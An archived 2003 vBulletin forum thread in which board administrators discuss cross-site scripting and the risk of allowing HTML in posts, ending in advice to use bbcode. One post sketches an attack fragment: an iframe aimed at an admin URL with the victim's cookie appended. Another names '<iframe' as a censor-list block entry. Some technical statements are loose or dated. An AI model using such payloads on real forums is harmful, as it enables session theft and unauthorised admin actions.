Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
Reload this Page what is XSS and how can they affect a board with HTML turned on?
FAQ Community Calendar Today's Posts Search

Reply
Page 1 of 2 1 2
 
Thread Tools Display Modes
  #1  
Old 04-15-2003, 03:01 AM
Gutspiller's Avatar
Gutspiller Gutspiller is offline
 
Join Date: Dec 2001
Posts: 1,046
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default what is XSS and how can they affect a board with HTML turned on?
Are they certain HTML commands?
Reply With Quote
  #2  
Old 04-15-2003, 10:10 AM
filburt1 filburt1 is offline
 
Join Date: Feb 2002
Location: Maryland, US
Posts: 6,144
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
XSS is cross-side scripting. In a nutshell it allows people to inject malicious Javascript that captures the user's cookies (which remember, one of them is the user's hashed password) and redirect them to their own side so they can be brute force attacked and eventually reverted back to the original password.
Reply With Quote
  #3  
Old 04-15-2003, 04:50 PM
okrogius okrogius is offline
 
Join Date: Dec 2001
Location: USA
Posts: 264
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Additionally to that with some javascript can have arbitrary commands executed when an admin views a page with the malicious code.

i.e. iframe with src pointing to /admin/....?....&username="+getCookie('bbusername')+"
Reply With Quote
  #4  
Old 04-15-2003, 05:06 PM
filburt1 filburt1 is offline
 
Join Date: Feb 2002
Location: Maryland, US
Posts: 6,144
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I'm not sure if iframes inherit the cookies.
Reply With Quote
  #5  
Old 04-15-2003, 06:02 PM
Erwin's Avatar
Erwin Erwin is offline
 
Join Date: Jan 2002
Posts: 7,604
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
There is no way of enabling HTML and keeping your site secure.

In any case, there is a thread on vB.com about turning on HTML and keeping it as safe as possible.
Reply With Quote
  #6  
Old 04-15-2003, 10:50 PM
Gutspiller's Avatar
Gutspiller Gutspiller is offline
 
Join Date: Dec 2001
Posts: 1,046
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Is there a way to block Xss scripts without upgrading? Is the only other way to turn off html? If there is a certain command to run xss scripts, can't you just add that command to your censor list?

I have "<iframe" added to my censor list and nobody can run an iframe, yet they can still run html. Something like this possible?
Reply With Quote
  #7  
Old 04-15-2003, 10:51 PM
filburt1 filburt1 is offline
 
Join Date: Feb 2002
Location: Maryland, US
Posts: 6,144
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Never, ever enable HTML anywhere on your board. There is no 100% secure way of enabling it and still letting users post in it.
Reply With Quote
  #8  
Old 04-15-2003, 10:53 PM
Gutspiller's Avatar
Gutspiller Gutspiller is offline
 
Join Date: Dec 2001
Posts: 1,046
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Today at 05:51 PM filburt1 said this in Post #6
Never, ever disable HTML anywhere on your board. There is no 100% secure way of enabling it and still letting users post in it.

You mean never ever enable it.

Maybe I could get some help. how creating a secure way to run it.
Reply With Quote
  #9  
Old 04-16-2003, 12:13 PM
Logician's Avatar
Logician Logician is offline
 
Join Date: Nov 2001
Location: inside vb code
Posts: 4,449
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Today at 01:53 AM Gutspiller said this in Post #8
You mean never ever enable it.

Maybe I could get some help. how creating a secure way to run it.
Why do you need HTML? What feature does it add to your board that you can not have with bbcode?

You can really create a new bbcode for many HTML commands you need in your site and then disable the HTML altogether.

Or another alternative may be enabling it for certain (trusted) usergroups only and disabling for the rest (Check Hack releases forum for this hack).

As filbert stated do not enable it for all if you don't want a site that has serious security gaps.
Reply With Quote
  #10  
Old 04-16-2003, 05:35 PM
okrogius okrogius is offline
 
Join Date: Dec 2001
Location: USA
Posts: 264
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Yesterday at 06:53 PM Gutspiller said this in Post #8
You mean never ever enable it.

Maybe I could get some help. how creating a secure way to run it.
bbcode is your secure way of running it.
Reply With Quote
Reply
Page 1 of 2 1 2

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 10:21 PM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04081 seconds
  • Memory Usage 2,248KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (3)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete